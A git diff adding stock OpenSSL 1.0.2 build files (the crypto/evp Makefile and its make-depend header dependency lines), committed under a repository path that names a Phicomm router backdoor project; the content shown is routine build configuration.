+evp_lib.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+evp_lib.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+evp_lib.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+evp_lib.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+evp_lib.o: ../../include/openssl/symhacks.h ../cryptlib.h evp_lib.c
+evp_pbe.o: ../../e_os.h ../../include/openssl/asn1.h
+evp_pbe.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+evp_pbe.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+evp_pbe.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+evp_pbe.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+evp_pbe.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+evp_pbe.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+evp_pbe.o: ../../include/openssl/pkcs12.h ../../include/openssl/pkcs7.h
+evp_pbe.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+evp_pbe.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+evp_pbe.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+evp_pbe.o: ../cryptlib.h evp_locl.h evp_pbe.c
+evp_pkey.o: ../../e_os.h ../../include/openssl/asn1.h
+evp_pkey.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+evp_pkey.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+evp_pkey.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+evp_pkey.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+evp_pkey.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+evp_pkey.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+evp_pkey.o: ../../include/openssl/pkcs7.h ../../include/openssl/rand.h
+evp_pkey.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+evp_pkey.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+evp_pkey.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+evp_pkey.o: ../asn1/asn1_locl.h ../cryptlib.h evp_pkey.c
+m_dss.o: ../../e_os.h ../../include/openssl/asn1.h ../../include/openssl/bio.h
+m_dss.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+m_dss.o: ../../include/openssl/dsa.h ../../include/openssl/e_os2.h
+m_dss.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+m_dss.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+m_dss.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+m_dss.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+m_dss.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+m_dss.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+m_dss.o: ../cryptlib.h m_dss.c
+m_dss1.o: ../../e_os.h ../../include/openssl/asn1.h ../../include/openssl/bio.h
+m_dss1.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+m_dss1.o: ../../include/openssl/dsa.h ../../include/openssl/e_os2.h
+m_dss1.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+m_dss1.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+m_dss1.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+m_dss1.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+m_dss1.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+m_dss1.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+m_dss1.o: ../cryptlib.h m_dss1.c
+m_ecdsa.o: ../../e_os.h ../../include/openssl/asn1.h
+m_ecdsa.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+m_ecdsa.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+m_ecdsa.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+m_ecdsa.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+m_ecdsa.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+m_ecdsa.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+m_ecdsa.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+m_ecdsa.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+m_ecdsa.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+m_ecdsa.o: ../../include/openssl/x509_vfy.h ../cryptlib.h m_ecdsa.c
+m_md2.o: ../../e_os.h ../../include/openssl/bio.h
+m_md2.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+m_md2.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+m_md2.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+m_md2.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+m_md2.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+m_md2.o: ../../include/openssl/symhacks.h ../cryptlib.h m_md2.c
+m_md4.o: ../../e_os.h ../../include/openssl/asn1.h ../../include/openssl/bio.h
+m_md4.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+m_md4.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+m_md4.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+m_md4.o: ../../include/openssl/md4.h ../../include/openssl/obj_mac.h
+m_md4.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+m_md4.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+m_md4.o: ../../include/openssl/pkcs7.h ../../include/openssl/rsa.h
+m_md4.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+m_md4.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+m_md4.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+m_md4.o: ../cryptlib.h evp_locl.h m_md4.c
+m_md5.o: ../../e_os.h ../../include/openssl/asn1.h ../../include/openssl/bio.h
+m_md5.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+m_md5.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+m_md5.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+m_md5.o: ../../include/openssl/md5.h ../../include/openssl/obj_mac.h
+m_md5.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+m_md5.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+m_md5.o: ../../include/openssl/pkcs7.h ../../include/openssl/rsa.h
+m_md5.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+m_md5.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+m_md5.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+m_md5.o: ../cryptlib.h evp_locl.h m_md5.c
+m_mdc2.o: ../../e_os.h ../../include/openssl/asn1.h ../../include/openssl/bio.h
+m_mdc2.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+m_mdc2.o: ../../include/openssl/des.h ../../include/openssl/des_old.h
+m_mdc2.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+m_mdc2.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+m_mdc2.o: ../../include/openssl/mdc2.h ../../include/openssl/obj_mac.h
+m_mdc2.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+m_mdc2.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+m_mdc2.o: ../../include/openssl/pkcs7.h ../../include/openssl/rsa.h
+m_mdc2.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+m_mdc2.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+m_mdc2.o: ../../include/openssl/ui.h ../../include/openssl/ui_compat.h
+m_mdc2.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+m_mdc2.o: ../cryptlib.h evp_locl.h m_mdc2.c
+m_null.o: ../../e_os.h ../../include/openssl/asn1.h ../../include/openssl/bio.h
+m_null.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+m_null.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+m_null.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+m_null.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+m_null.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+m_null.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pkcs7.h
+m_null.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+m_null.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+m_null.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+m_null.o: ../cryptlib.h m_null.c
+m_ripemd.o: ../../e_os.h ../../include/openssl/asn1.h
+m_ripemd.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+m_ripemd.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+m_ripemd.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+m_ripemd.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+m_ripemd.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+m_ripemd.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+m_ripemd.o: ../../include/openssl/pkcs7.h ../../include/openssl/ripemd.h
+m_ripemd.o: ../../include/openssl/rsa.h ../../include/openssl/safestack.h
+m_ripemd.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+m_ripemd.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+m_ripemd.o: ../../include/openssl/x509_vfy.h ../cryptlib.h evp_locl.h
+m_ripemd.o: m_ripemd.c
+m_sha.o: ../../e_os.h ../../include/openssl/asn1.h ../../include/openssl/bio.h
+m_sha.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+m_sha.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+m_sha.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+m_sha.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+m_sha.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+m_sha.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pkcs7.h
+m_sha.o: ../../include/openssl/rsa.h ../../include/openssl/safestack.h
+m_sha.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+m_sha.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+m_sha.o: ../../include/openssl/x509_vfy.h ../cryptlib.h evp_locl.h m_sha.c
+m_sha1.o: ../../e_os.h ../../include/openssl/asn1.h ../../include/openssl/bio.h
+m_sha1.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+m_sha1.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+m_sha1.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+m_sha1.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+m_sha1.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+m_sha1.o: ../../include/openssl/ossl_typ.h ../../include/openssl/rsa.h
+m_sha1.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+m_sha1.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+m_sha1.o: ../cryptlib.h m_sha1.c
+m_sigver.o: ../../e_os.h ../../include/openssl/asn1.h
+m_sigver.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+m_sigver.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+m_sigver.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+m_sigver.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+m_sigver.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+m_sigver.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+m_sigver.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+m_sigver.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+m_sigver.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+m_sigver.o: ../../include/openssl/x509_vfy.h ../cryptlib.h evp_locl.h
+m_sigver.o: m_sigver.c
+m_wp.o: ../../e_os.h ../../include/openssl/asn1.h ../../include/openssl/bio.h
+m_wp.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+m_wp.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+m_wp.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+m_wp.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+m_wp.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+m_wp.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pkcs7.h
+m_wp.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+m_wp.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+m_wp.o: ../../include/openssl/whrlpool.h ../../include/openssl/x509.h
+m_wp.o: ../../include/openssl/x509_vfy.h ../cryptlib.h evp_locl.h m_wp.c
+names.o: ../../e_os.h ../../include/openssl/asn1.h ../../include/openssl/bio.h
+names.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+names.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+names.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+names.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+names.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+names.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pkcs7.h
+names.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+names.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+names.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+names.o: ../cryptlib.h names.c
+p5_crpt.o: ../../e_os.h ../../include/openssl/asn1.h
+p5_crpt.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+p5_crpt.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+p5_crpt.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+p5_crpt.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+p5_crpt.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+p5_crpt.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+p5_crpt.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+p5_crpt.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+p5_crpt.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+p5_crpt.o: ../../include/openssl/x509_vfy.h ../cryptlib.h p5_crpt.c
+p5_crpt2.o: ../../e_os.h ../../include/openssl/asn1.h
+p5_crpt2.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+p5_crpt2.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+p5_crpt2.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+p5_crpt2.o: ../../include/openssl/hmac.h ../../include/openssl/lhash.h
+p5_crpt2.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+p5_crpt2.o: ../../include/openssl/opensslconf.h
+p5_crpt2.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+p5_crpt2.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+p5_crpt2.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+p5_crpt2.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+p5_crpt2.o: ../../include/openssl/x509_vfy.h ../cryptlib.h evp_locl.h
+p5_crpt2.o: p5_crpt2.c
+p_dec.o: ../../e_os.h ../../include/openssl/asn1.h ../../include/openssl/bio.h
+p_dec.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+p_dec.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+p_dec.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+p_dec.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+p_dec.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+p_dec.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pkcs7.h
+p_dec.o: ../../include/openssl/rand.h ../../include/openssl/rsa.h
+p_dec.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+p_dec.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+p_dec.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+p_dec.o: ../cryptlib.h p_dec.c
+p_enc.o: ../../e_os.h ../../include/openssl/asn1.h ../../include/openssl/bio.h
+p_enc.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+p_enc.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+p_enc.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+p_enc.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+p_enc.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+p_enc.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pkcs7.h
+p_enc.o: ../../include/openssl/rand.h ../../include/openssl/rsa.h
+p_enc.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+p_enc.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+p_enc.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+p_enc.o: ../cryptlib.h p_enc.c
+p_lib.o: ../../e_os.h ../../include/openssl/asn1.h
+p_lib.o: ../../include/openssl/asn1_mac.h ../../include/openssl/bio.h
+p_lib.o: ../../include/openssl/bn.h ../../include/openssl/buffer.h
+p_lib.o: ../../include/openssl/crypto.h ../../include/openssl/dh.h
+p_lib.o: ../../include/openssl/dsa.h ../../include/openssl/e_os2.h
+p_lib.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+p_lib.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+p_lib.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+p_lib.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+p_lib.o: ../../include/openssl/pkcs7.h ../../include/openssl/rsa.h
+p_lib.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+p_lib.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+p_lib.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+p_lib.o: ../asn1/asn1_locl.h ../cryptlib.h p_lib.c
+p_open.o: ../../e_os.h ../../include/openssl/asn1.h ../../include/openssl/bio.h
+p_open.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+p_open.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+p_open.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+p_open.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+p_open.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+p_open.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pkcs7.h
+p_open.o: ../../include/openssl/rsa.h ../../include/openssl/safestack.h
+p_open.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+p_open.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+p_open.o: ../../include/openssl/x509_vfy.h ../cryptlib.h p_open.c
+p_seal.o: ../../e_os.h ../../include/openssl/asn1.h ../../include/openssl/bio.h
+p_seal.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+p_seal.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+p_seal.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+p_seal.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+p_seal.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+p_seal.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pkcs7.h
+p_seal.o: ../../include/openssl/rand.h ../../include/openssl/rsa.h
+p_seal.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+p_seal.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+p_seal.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+p_seal.o: ../cryptlib.h p_seal.c
+p_sign.o: ../../e_os.h ../../include/openssl/asn1.h ../../include/openssl/bio.h
+p_sign.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+p_sign.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+p_sign.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+p_sign.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+p_sign.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+p_sign.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pkcs7.h
+p_sign.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+p_sign.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+p_sign.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+p_sign.o: ../cryptlib.h p_sign.c
+p_verify.o: ../../e_os.h ../../include/openssl/asn1.h
+p_verify.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+p_verify.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+p_verify.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+p_verify.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+p_verify.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+p_verify.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+p_verify.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+p_verify.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+p_verify.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+p_verify.o: ../../include/openssl/x509_vfy.h ../cryptlib.h p_verify.c
+pmeth_fn.o: ../../e_os.h ../../include/openssl/asn1.h
+pmeth_fn.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+pmeth_fn.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+pmeth_fn.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+pmeth_fn.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+pmeth_fn.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+pmeth_fn.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+pmeth_fn.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+pmeth_fn.o: ../../include/openssl/symhacks.h ../cryptlib.h evp_locl.h
+pmeth_fn.o: pmeth_fn.c
+pmeth_gn.o: ../../e_os.h ../../include/openssl/asn1.h
+pmeth_gn.o: ../../include/openssl/bio.h ../../include/openssl/bn.h
+pmeth_gn.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+pmeth_gn.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+pmeth_gn.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+pmeth_gn.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+pmeth_gn.o: ../../include/openssl/opensslconf.h
+pmeth_gn.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+pmeth_gn.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+pmeth_gn.o: ../../include/openssl/symhacks.h ../cryptlib.h evp_locl.h
+pmeth_gn.o: pmeth_gn.c
+pmeth_lib.o: ../../e_os.h ../../include/openssl/asn1.h
+pmeth_lib.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+pmeth_lib.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+pmeth_lib.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+pmeth_lib.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+pmeth_lib.o: ../../include/openssl/objects.h
+pmeth_lib.o: ../../include/openssl/opensslconf.h
+pmeth_lib.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+pmeth_lib.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+pmeth_lib.o: ../../include/openssl/symhacks.h ../asn1/asn1_locl.h ../cryptlib.h
+pmeth_lib.o: evp_locl.h pmeth_lib.c
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/Makefile.save b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/Makefile.save
new file mode 100644
index 0000000..842f473
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/Makefile.save
@@ -0,0 +1,736 @@
+#
+# OpenSSL/crypto/evp/Makefile
+#
+
+DIR=	evp
+TOP=	../..
+CC=	cc
+INCLUDES= -I.. -I$(TOP) -I../../include
+CFLAG=-g
+MAKEFILE=	Makefile
+AR=		ar r
+
+CFLAGS= $(INCLUDES) $(CFLAG)
+
+GENERAL=Makefile
+TEST=evp_test.c
+TESTDATA=evptests.txt
+APPS=
+
+LIB=$(TOP)/libcrypto.a
+LIBSRC= encode.c digest.c evp_enc.c evp_key.c evp_acnf.c evp_cnf.c \
+	e_des.c e_bf.c e_idea.c e_des3.c e_camellia.c\
+	e_rc4.c e_aes.c names.c e_seed.c \
+	e_xcbc_d.c e_rc2.c e_cast.c e_rc5.c \
+	m_null.c m_md2.c m_md4.c m_md5.c m_sha.c m_sha1.c m_wp.c \
+	m_dss.c m_dss1.c m_mdc2.c m_ripemd.c m_ecdsa.c\
+	p_open.c p_seal.c p_sign.c p_verify.c p_lib.c p_enc.c p_dec.c \
+	bio_md.c bio_b64.c bio_enc.c evp_err.c e_null.c \
+	c_all.c c_allc.c c_alld.c evp_lib.c bio_ok.c \
+	evp_pkey.c evp_pbe.c p5_crpt.c p5_crpt2.c \
+	e_old.c pmeth_lib.c pmeth_fn.c pmeth_gn.c m_sigver.c \
+	e_aes_cbc_hmac_sha1.c e_aes_cbc_hmac_sha256.c e_rc4_hmac_md5.c
+
+LIBOBJ=	encode.o digest.o evp_enc.o evp_key.o evp_acnf.o evp_cnf.o \
+	e_des.o e_bf.o e_idea.o e_des3.o e_camellia.o\
+	e_rc4.o e_aes.o names.o e_seed.o \
+	e_xcbc_d.o e_rc2.o e_cast.o e_rc5.o \
+	m_null.o m_md2.o m_md4.o m_md5.o m_sha.o m_sha1.o m_wp.o \
+	m_dss.o m_dss1.o m_mdc2.o m_ripemd.o m_ecdsa.o\
+	p_open.o p_seal.o p_sign.o p_verify.o p_lib.o p_enc.o p_dec.o \
+	bio_md.o bio_b64.o bio_enc.o evp_err.o e_null.o \
+	c_all.o c_allc.o c_alld.o evp_lib.o bio_ok.o \
+	evp_pkey.o evp_pbe.o p5_crpt.o p5_crpt2.o \
+	e_old.o pmeth_lib.o pmeth_fn.o pmeth_gn.o m_sigver.o \
+	e_aes_cbc_hmac_sha1.o e_aes_cbc_hmac_sha256.o e_rc4_hmac_md5.o
+
+SRC= $(LIBSRC)
+
+EXHEADER= evp.h
+HEADER=	evp_locl.h $(EXHEADER)
+
+ALL=    $(GENERAL) $(SRC) $(HEADER)
+
+top:
+	(cd ../..; $(MAKE) DIRS=crypto SDIRS=$(DIR) sub_all)
+
+all:	lib
+
+lib:	$(LIBOBJ)
+	$(AR) $(LIB) $(LIBOBJ)
+	$(RANLIB) $(LIB) || echo Never mind.
+	@touch lib
+
+files:
+	$(PERL) $(TOP)/util/files.pl Makefile >> $(TOP)/MINFO
+
+links:
+	@$(PERL) $(TOP)/util/mklink.pl ../../include/openssl $(EXHEADER)
+	@$(PERL) $(TOP)/util/mklink.pl ../../test $(TEST)
+	@[ -f $(TESTDATA) ] && cp $(TESTDATA) ../../test && echo "$(TESTDATA) -> ../../test/$(TESTDATA)"
+	@$(PERL) $(TOP)/util/mklink.pl ../../apps $(APPS)
+
+install:
+	@[ -n "$(INSTALLTOP)" ] # should be set by top Makefile...
+	@headerlist="$(EXHEADER)"; for i in $$headerlist ; \
+	do  \
+	(cp $$i $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i; \
+	chmod 644 $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i ); \
+	done;
+
+tags:
+	ctags $(SRC)
+
+tests:
+
+lint:
+	lint -DLINT $(INCLUDES) $(SRC)>fluff
+
+depend:
+	@[ -n "$(MAKEDEPEND)" ] # should be set by upper Makefile...
+	$(MAKEDEPEND) -- $(CFLAG) $(INCLUDES) $(DEPFLAG) -- $(LIBSRC)
+
+dclean:
+	$(PERL) -pe 'if (/^# DO NOT DELETE THIS LINE/) {print; exit(0);}' $(MAKEFILE) >Makefile.new
+	mv -f Makefile.new $(MAKEFILE)
+
+clean:
+	rm -f *.o *.obj lib tags core .pure .nfs* *.old *.bak fluff
+
+# DO NOT DELETE THIS LINE -- make depend depends on it.
+
+bio_b64.o: ../../e_os.h ../../include/openssl/asn1.h
+bio_b64.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+bio_b64.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+bio_b64.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+bio_b64.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+bio_b64.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+bio_b64.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+bio_b64.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+bio_b64.o: ../../include/openssl/symhacks.h ../cryptlib.h bio_b64.c
+bio_enc.o: ../../e_os.h ../../include/openssl/asn1.h
+bio_enc.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+bio_enc.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+bio_enc.o: ../../include/openssl/err.h ../../include/openssl/evp.h
